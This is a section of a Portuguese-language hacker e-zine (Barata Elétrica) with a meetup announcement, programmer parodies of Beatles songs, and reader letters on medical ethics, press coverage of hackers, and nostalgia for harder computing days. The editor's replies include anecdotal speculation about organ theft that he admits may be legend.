Em São Paulo, começaram a acontecer, embora não em horários  e datas regulares, encontros de hackers. Aqueles que se interessarem, está  sendo criada uma lista para a divulgação desses encontros. Provavelmente vai rolar na lista hackers.braz ou qualquer outra que estiver disponível. Como é que estão sendo? Bom, tem gente comparecendo e não só wannabes. Mas como de vez em quando pinta um "desencontro",  acho prematuro eu chegar aqui e divulgar página tal, provedor tal, pelo simples fato que:

1) ainda acho cedo

2) esse fanzine fica em html, zip e txt por tudo quanto e' lugar do mundo. Falar que bar tal ou pagina tal esta' acontecendo isso ou aquilo, é uma verdadeira propaganda pra qualquer estabelecimento. Minha página no geocities continua recebendo visitas, apesar de ser de outro cara, agora ( a Geocities resolveu detonar com minha página no SiliconValley/5620)

3) Quero fazer uma página com o local de encontros hackers no Brasil inteiro. Vai fica na mesma página em que estiver os ultimos números do Barata Elétrica.

4) Último. Quem é fussador, acaba descobrindo sozinho.

Aqueles em outros estados que quiserem que eu divulgue encontros (detalhe: de preferência a moçada que já faz encontros 2600) me avisem.


Se os Beatles fossem programadores (contribuição da lista de piadas)

      YESTERDAY
      Yesterday,
      All those backups seemed a waste of pay.
      Now my database has gone away.
      Oh I believe in yesterday.
      Suddenly,
      There's not half the files there used to be,
      And there's a milestone
      hanging over me
      The system crashed so suddenly.
      I pushed something wrong
      What it was I could not say.
      Now all my data's gone
      and I long for yesterday-ay-ay-ay.
      Yesterday,
      The need for back-ups seemed so far away.
      I knew my data was all here to stay,
      Now I believe in yesterday.
      ============================================
      Songs to program by...

            Eleanor Rigby
            -------------
      Eleanor Rigby
      Sits at the keyboard
      And waits for a line on the screen
      Lives in a dream
      Waits for a signal
      Finding some code
      That will make the machine do some more.
      What is it for?
      All the lonely users, where do they all come from?
      All the lonely users, why does it take so long?
      Guru MacKenzie
      Typing the lines of a program that no one will run;
      Isn't it fun?
      Look at him working,
      Munching some chips as he waits for the code to compile;
      It takes  a while...
      All the lonely users, where do they all come from?
      All the lonely users, why does it take so long?
      Eleanor Rigby
      Crashes the system and loses 6 hours of work;
      Feels like a jerk.
      Guru MacKenzie
      Wiping the crumbs off the keys as he types in the code;
      Nothing will load.
      All the lonely users, where do they all come from?
      All the lonely users, why does it take so long?
       ===================================

           Unix Man (Nowhere Man)
            --------
      He's a real UNIX Man
      Sitting in his UNIX LAN
      Making all his UNIX plans
      For nobody.
      Knows the blocksize from du(1)
      Cares not where /dev/null goes to
      Isn't he a bit like you
      And me?
      UNIX Man, please listen(2)
      My lpd(8) is missin'
      UNIX Man
      The wo-o-o-orld is at(1) your command.
      He's as wise as he can be
      Uses lex and yacc and C
      UNIX Man, can you help me At all?
      UNIX Man, don't worry
      Test with time(1), don't hurry
      UNIX Man
      The new kernel boots, just like you had planned.
      He's a real UNIX Man
      Sitting in his UNIX LAN
      Making all his UNIX  plans For nobody ...
      Making all his UNIX  plans For nobody.
       ==================================

            Something
            ---------
      Something in the way it fails,
      Defies the algorithm's logic!
      Something in the way it coredumps...
      I don't want to leave it now
      I'll fix this problem somehow
      Somewhere in the memory I know,
      A pointer's got to be corrupted.
      Stepping in the debugger will show me...
      I don't want to leave it now
      I'm too close to leave it now
      You're asking me can this code go?
      I don't know, I don't know...
      What sequence causes it to blow?
      I don't know, I don't know...
      Something in the initializing code?
      And all I have to do is think of it!
      Something in the listing will show me...
      I don't want to leave it now
      I'll fix this tonight I vow!


CORREIO ELETRÔNICO:

Subject: Criticas

Li sua materia, e esta e uma parte dela:

"Do jeito que esta a situagco i atualmente, i (ou vai ser) um perigo entrar em coma num hospital qualquer. Sua carteira de identidade nco fala que vocj faz parte daqueles que acreditam em "doar" seus orgcos. Midico pensa: "vai custar X manter o cara vivo, mas fulano na fila precisando de um rim vai me dar Y se o cara morrer". I lei. O fato de que o midico dispts de seus orgcos possivelmente receber uma propina (nco sei se a classe midica ganha pouco a ponto de pensar que vale a pena declarar a morte cerebral de alguim para receber uma grana, isso i fruto da minha imaginagco) nco conta muito diante do fato de que existe uma lei permitindo lances relativos."

Infelizmente, nao concordo com vc. O que vc escreveu ai em cima e muito comprometedor. Uma denuncia dessas pode te causar muito problemas, com certeza desnecessarios. Nao sou medico, fique tranquilo.

[..]

O caso do medico ai em cima e um deles. Vc vive defendendo a classe hacker. Eu concordo. Mas, com uma materia dessas, vc nivel uma classe profissional das mais exigidas senao a maior, como a imprensa faz quando aquele adolescente poe fotos de sacanagem na pagina da Scottlan Yard. Ou quebra a senha de uma cartao de credito de um terceiro. E olha que sao fatos menores.

Nao vou dizer que nao existem erros. Pelo contrario, erros existem aos montes. Muitos sao prejudiciais, sim. Mas nao posso concordar que seja perigo entrar em coma em um hospital. A menos que existam crimes. E crimes contra a vida, os maiores de todos. A identidade diz se a pessoa e doadora ou nao. Violando isso, 1 crime. Deixando a pessoa morrer, 2 crimes. Assassinato e quebra de juramento. A familia permitindo a aceitar propina, o maior de todos, a sovinice, a ganancia. Ja tive familiares que lutaram ate o fim pela vida de seus parentes. E, nao posso negar que muitos medicos salvaram vidas, e se nao o conseguiram, tentaram ate o fim. Sou prova viva disto.

[..]

Um grando abraco e espero poder me comunicar melhor com vc.

Fabiano B???

Resposta:

Bom, como dizia Jack (o estripador):  "vamos por partes".  Na maior parte do texto eu não acusei, eu sugeri a hipótese. Mesmo que a classe médica resolvesse me processar nesse caso específico por calúnia e difamação, ia ser interessante. Porque não sou o único que aventou essa hipótese. Tem gente muito mais capacitada do que eu.. Inclusive teve uma matéria na revista "Caros Amigos" (no 6, setembro 97)- uma entrevista com o autor do livro "Mercado Humano - estudo bioético da compra e venda  de partes do corpo",  Volnei Garrafa Giovanni Berlinguer. Um dos entrevistadores, George Bourdokan relatou ter feito 1 programa Globo-Repórter em 1980 sobre roubo de órgãos em Botucatu, onde 1 moça acordou 1 mês depois sem as córneas. O programa não teria ido ao ar por ser "muito pesado". Eu já respondi essa carta em separado, mas se alguém mais ficou curioso por essa questão, vai aí o fato de que não tirei essa hipótese da minha cabeça, nem é ficção científica. Em vários casos, a prática da medicina "pode" ser um crime que compensa. Um exemplo muito pior e que nunca parei pra averiguar é que vários casos de internação na UTI são desnecessários: o paciente vai morrer mesmo e pra tirar alguma grana da família, os médicos falam que o caso ainda tem chance de recuperação. A assistente de enfermagem ou instrumentadora (sei lá, faz tanto tempo) que me falou isso, disse que o pessoal chama a sala pra esses casos desenganados de "antecâmara do inferno". Entre eles, o pessoal do hospital. Claro que isso veio de alguém que saiu da profissão, pode ser mentira ou caso isolado. Essa menina também me falou que em nenhum hospital particular, se você perguntar na recepção, médicos, etc.. existe uma sala para os desenganados. Claro, o paciente desenganado não precisa de UTI ou tratamentos caros que dão lucro pro hospital. Porque o Brasil é um dos campeões de cesarianas? Vaidade? Não só isso, a cesaria é mais cara do que parto natural. Também já ouvi falar de várias lendas urbanas onde a moral é a mesma: o médico ganha mais para amputar até o joelho, do que só o pé... Ouvi isso de diferentes classes sociais. Pode ser lenda. Mas já vi na revista VEJA inclusive, reportagens sobre "erros médicos" envolvendo transplantes. Houve um escândalo internacional envolvendo esterilização forçada de doentes mentais na Suécia. A China estaria vendendo órgãos de prisioneiros políticos executados.  Se lá fazem monstruosidades desse tipo, em países do primeiro e do terceiro  mundo, será que não fazem aqui?


CARTA DA GRANDE IMPRENSA

Subject: Re: Segurança e hacking na Internet

D????? H?????? wrote:
>=20
> Caro Derneval,
>=20
> Sou um repórter do Caderno de Informárica da ????? de S.P. e estou
> trabalhando em uma matéria sobre segurança e hackers (sem nenhuma
> conotação pejorativa) na Internet. Acho que seria interessante
> desmistificar para o usuário "newbie", ou "wannabe", ou simplismente
> doméstico, o mundo do hacking na rede. Gostaria de poder trocar
> informações com você sobre o assunto. Caso isso não seja possível,
> responda-me o quanto antes. A reportagem será capa da edição do dia ??
> de ???????mbro.
>=20
> Se você concordar, ficaria grato se você respondesse às seguintes
> perguntas:
>=20
> 1. Para você o que são e quais as principais diferenças entre hackers e
> crackers? Seus perfis, ética e "modus operandi":
>=20
> 2. Do que um hacker (ou cracker) é capaz? Você acha que sua capacid=
ade é
> superestimada? Ou é a segurança das Intranets que é superestimada? As
> empresas estão preparadas? Os firewalls são uma blindagem eficiente?
>=20
> 3. Quais as formas básicas de invasão? Telef=F4nica, via Internet, =
física,
> por meio da "engenharia social" etc...?
>=20
> 4. Qual a melhor segurança para o usuário doméstico?
>=20
> 5. Do que um hacker (ou cracker precisa)? Equipamento básico, de hard e
> soft, conhecimento de linguagens sistemas etc...
>=20
> 6. Quais são os alvos mais vulneráveis? E os mais procurados?
>=20
> Se você não tiver tempo, ou paciência, para me responder através de
> e-mail, seria possível conversarmos pelo telefone para que eu obtivesse
> uma declaração de sua parte? Ficaria muito grato pela colaboração. Você
> deve saber como é difícil conseguir um pronunciamento de qualquer um dos
> lados dessa questão.
>=20
> Agradeço,
>=20
> D???? H??????
> (repórter free-lancer
>  da ??????de ?. ?.)    
RESPOSTA: Esta primeira carta dá uma idéia de quais são as intenções 
da chamada "grande imprensa" em relação ao assunto "HACKERS". Claro
que a resposta foi negativa, seguida da explicação de que apenas 
escrevo sobre o assunto. E "hacking" pra mim é explorar ao máximo
os recursos do computador. Esse tipo de coisa. Aí veio a segunda 
carta. E com acentos, de novo (esse pessoal não aprende.. não se usa
acentuação nem cedilha na internet). Ah, sim, e não foi a única 
que recebi.

Vai abaixo o meu REPLY para o segundo convite para discutir o assunto:

Subject: Sua reportagem

>           Caro Derneval,
> 
>           Entendo a sua relutância em colaborar com a minha reportagem ante a
>           abordagem pejorativa do hacking e a sua trajetória -para falar a verdade
>           eu não esperava que você sequer me respondesse com a ojeriza que
>           qualquer um do meio sente com jornalistas "fuçando" o tema hacking (você


Eu nao tenho condicoes de saber o que voce sentiu lendo o meu email. Mas
como pintou uma reportagem sobre "contra-ataque dos crackers" ate' entendo
sua  argumentacao. 
 
>           vê a relação?). Contudo acho que você também deveria tentar ver as
>           coisas de onde estou...
> 
>           Serei sincero ("quid pro quo", compreende?): sou um estudante de
>           ???????? de ?? anos que estou trabalhando há cinco meses como
>           free-lancer do Caderno ????????? d? ????????? e não sou nenhum graúdo
>           de rabo preso com o establishment corporativo. Não mantenho nenhum

???????? (vou te chamar desse jeito, nao sou bom para nomes),
Voce tem ?? anos a menos do que eu. Eu nunca te vi. Nao tenho razoes
para te odiar como pessoa. So' que, da mesma forma que foi relatado no
artigo la' da revista ????????, eu adquiri uma relutancia para conversar com
qualquer um do meio jornalistico. Pelo simples fato de que houve um
numero de reportagens sobre o assunto e a grande maioria esmagadora foi
de reportagens detonando com a imagem, para que eu vou assumir riscos?
Algumas das reportagens que detonaram, como "Confidências de um Cracker",
teve gente me contatando antes. O editor passou para outra pessoa que
nao se importava em detonar e falar mal de hackers. A ???????? ?????
chegou ao cumulo de associar hackers com adolescentes chatos. Nao
senhor. Nao quero colaborar com isso. Ainda mais quando estou em pleno
processo de procurar emprego?  

>           interesse em desvirtuar a imagem de um grupo que considero essencial
>           para que a informática se preserve como um agente de livre-expressão.
>           Minha curiosidade por hacking veio muito antes de eu estar n? ?????? e
>           venho propondo esta pauta com meu editor por acreditar na sua
>           pertinência para o usuário doméstico diante das quetões de segurança na
>           rede, e para desmistificar o papel do hacking. Você tem toda razão
>           quanto aos preconceitos editoriais, mas apesar d? m??? chefe (? edit?r?
>           ???????? ??????) não considerar a questão da mesma forma como eu el? está
>           me dando carta-branca para trabalhar esta matéria para a capa de um
>           caderno daqui a ??? ???????.

TUDO BEM. Hoje, a materia e' interessante. Voce sabia que houve uma
conferencia de Hackers e fabricantes de virus em outubro de 94? Uma
pusta duma conferencia de hackers la' na Argentina. Sabia que eu dei a
dica para um cara chamado ??????? ??????, que trabalha (va?) ai' onde voce
esta? Sabia que nao houve interesse nenhum dele nem antes nem depois em
OUVIR o que eu tinha pra falar, uma vez que fui um dos 3 brasileiros que
foi (isso, porque eu morava no mesmo conjunto habitacional que ele)? E'
culpa sua? Nao, nao e' culpa sua. To contando essa historia p. te
mostrar que quando alguem quer falar, a imprensa nao quer ouvir, ou
porque nao tem tempo, ou porque nao considera a materia como
interessante, nao ve publico para ela. (Por um outro lado, outro jornal
concorrente de voces felizmente tinha alguem que se interessou e saiu 
algumas linhas do que rolou la' em Buenos Aires) 
   Do meu ponto de vista, se voces(to falando a voce como representante 
do seu jornal, entenda que ha' uma diferenca) nao se interessaram
por isso nem 94, nao se interessaram por isso em 95 quando fui para a
Inglaterra e fui em outra conferencia, nao se interessaram por isso em
agosto de 97, quando houve uma conferencia de hackers na Holanda (olha
as dicas) por que diabos eu deveria dar atencao a voces agora?

>           Apesar de ser um assunto tabu no meio
>           venho entrevistando diversos especialistas (hackers em certo sentido) em
>           informática, segurança em redes, computação bancária, direito digital e
>           grupos de hackers éticos, profissionais (gostaria de saber sua opinião
>           sobre esta atividade). E é claro que esta pauta também abarca o ângulo

Minha opiniao pessoal e' a que esta' no barata eletrica 16, no artigo
sobre hackers e a midia. Pra resumir, acho que tem algum anunciante de
firewall ou coisa do genero pagando p. ver uma materia dessas sair. E
mais, o pessoal que vai se auto proclamar hackers vai falar que "matam a
cobra e mostram o pau". Se brincar vai sair em letras bem miudinhas que
o Barata Eletrica nao procura estimular vandalismo eletronico. A parte
de vandalismo eletronico, provavelmente saira' em letras garrafais, com
algum titulo bem marcante e um monte de links para fazer mail-bombs e
coisa do genero.. duvido que publiquem que o NT 4.0 ta' cheio de furos
que permitem um provedor ser hackeado ou que o Linux (sistema
operacional preferido) e' bem mais estavel e compete como software para
provedor sem ter nenhuma propaganda alem do boca-a-boca.

>           do adolescente vândalo (que não é o mesmo que um hacker de fato, ao meu
>           ver), mas se estou entrando em contato com você não foi por associá-lo
>           com este perfil mas por respeito ao trabalho que o seu zine fez em
>           divulgar a cultura underground do hacking no Brasil, o que mereceu o
>           reconhecimento da 2600 americana. 

Claro que mereceu. Por várias razões que não vem ao caso.
Foi por saber que a imprensa nao teria interesse
no assunto que acabei fazendo o primeiro fanzine brasileiro na Internet,
era a Agencia Estado, Agencia Folha e Barata Eletrica na lista de
publicacoes brasileiras na web. Por bem mais de 6 meses. Nunca ninguem
d? ???????? teve interesse em me entrevistar por conta disso. Fizeram acho
que duas ou tres  materias sobre fanzines nacionais desde que comecei o
Barata Eletrica. So' na ultima e' que o Barata Eletrica foi mencionado.
E ainda assim erraram o URL. Voce tem culpa disso? Nao, nao e' culpa
sua.

>           Não estou lhe dando este esclarecimento para tentar demovê-lo de sua
>           posição -que, de certo modo, acho coerente- mas para que você não pense
>           que todos os jornalistas -mesmo um lammer inexperiente como eu-
>           trabalham de má-fé. A impresa não é só o meio onipresente e hegemênico
>           que você enxerga de seu lado, mas caras pacatos, curiosos, "fuçadores"
>           bem-intencionados, que estão tentando fazer algo autêntico e construtivo
>           e que muitas vezes não têm o poder para fazê-lo. 

Eu confio tanto na imprensa quanto confio num colega hacker. Acho que
todo mundo trabalha de boa fe', garantindo o salario no final do mes. 

>           O que quero dizer é que talvez você tenha um lugar nessa questão e que
>           se você acha que todas as reportagens com esse tema são estúpidas, bem,
>           talvez em certos casos tenha sido pela falta da colaboração de todas as
>           pessoas envolvidas...

No meu caso, tenho a consciencia limpa. Parei de colaborar depois que vi
as sacanagens que estava ajudando a fazer. A imprensa e' bem menos
imparcial que apregoa. E todo editor fala que o reporter tem carta pra
branca pra escrever o que quiser.. parece ate' que voce nao leu "O crime
do Padre Amaro". Eu nao vou acreditar no que voce falar acerca disso..

>           De qualquer maneira parabéns pelo BE (quando sai um próximo número?). 
>

Em um mes, mais ou menos. 
>           Caso você mude de idéia, responda este e-mail ou me ligue n? ??????
>           (011-????????????), das 13h às 19h -no contato por voz dá para se saber
>           melhor com quem se está lidando.
> 

Seu email ta' guardado. Sem ressentimentos.


Quanto a usar o nome Barata Eletrica ou informacoes contidas, nele, fica
livre qualquer referencia, nao to nem ai'. Quiser divulgar os links do
Barata igualmente. Mas que fique claro que hackear para o Barata
Eletrica e' conseguir acesso a informacao e explorar os limites da
capacidade do computador. E' isso o que considero hacking e e' disso que
falo no BE embora comente o computer underground.

Valeu.
>           Um abraço,
> 
>      ??????? ???????

P.S. Quando eu finalmente fizer meu encontro de hackers ou achar que finalmente a imprensa não está mais usando os hackers como forma de explorar o assunto "vandalismo eletrônico", ficarei feliz de ajudar qualquer reporter (que não me queira retratar como hacker ou como vândalo eletrônico).  Tenho o maior respeito pela imprensa, quando cumpre o seu papel.


From: "Luis Marcilio B.Oliveira" <marcilio@arcom.com.br>
Subject: Re: Os wannabes de hoje e os de antigamente

Luis Marcilio B.Oliveira wrote:

> v^v^v^v^v^v^v^v^v^v^v^v^v^v^v^v^v^v^v^v^v^v^v^v^v^v^v^v^v
> 
> Ola Derneval.
> 
> To te escrevendo pra comentar um pensamento que tive quando relia as
> primeiras edicoes do BE.
> 
> O que eu acho e que hoje as coisas estao faceis demais. Os micros estao
> muito poderosos e nao temos muita dificuldade mais para conseguir que as
> coisas rodem.
> 
> Isso as vezes me desanima um pouco.
> 
> Nao temos mais a necessidade de ficar "indo fundo" no dos porque o dos nao
> usa mais, nem ficar turbinando os micros, ja que fazer upgrade de memoria
> ficou tao facil.
> 
> Nao temos por que querer "enganar" a tarifacao da central telefonica para
> acessar um bbs interessante, ja que todas estao disponiveis na Internet,
> sem falar nos programinhas que as vezes vem ate compilados.
> 
> Nao estou dizendo que aprender por aprender nao seja interesante, mas como
> diz o ditado: a necessidade eh a mae da criatividade.
> 
> Nao sou um hacker. Pelo que escrevi acima da pra perceber. Me falta
> justamente o que escrevi acima. *Necessidade*.
> 
> Tenho certeza que voce tem mais conhecimentos para comentar sobre o
> assunto, portanto ficaria feliz em receber uma resposta.
> 
> Um abraco
> 
> Luis Marcilio
> 
> -----BEGIN PGP PUBLIC KEY BLOCK-----
> Version: 2.6.3ia
> 
> mQBNAzR0YnUAAAECANiPz456+QRyhqbb++PkuwvDIqw78dXvyB7vTbbD1A+Tcknb
> AFvPMkIKNDxFU9wpswv//VV5bk2SB8uvLUhbamEABRG0CG1hcmNpbGlviQBVAwUQ
> NHRidQfLry1IW2phAQE+IwH/RsJj0ajVBXuxpGroluxlEPy3KeRg5uLmOrHZ7GAh
> kwF75o6C4e/uvZP1cx5sSZ/ReF0JTpx7MYQHNI6VvE5z7g==
> =FQUO
> -----END PGP PUBLIC KEY BLOCK-----


E', esse problema tambem me acontece.. tinha ate' um artigo sobre isso
na 2600. Aconteceu comigo, inclusive. Eu arrumei um emprego onde acabei
montando um servidor. Vou brincar de hackear outro servidor pra que? 
Pro outro sysop avisar pro meu patrao e me demitir? Agora to desempregado, 
mas nao me cortaram as contas, entao o problema continua.. 

Nao sei o que responder. Meu desafio agora e' arrumar 1 emprego. Talvez
quando eu voltar a mexer com o Linux, reencontre os grandes desafios.

Valeu.

assinado: Derneval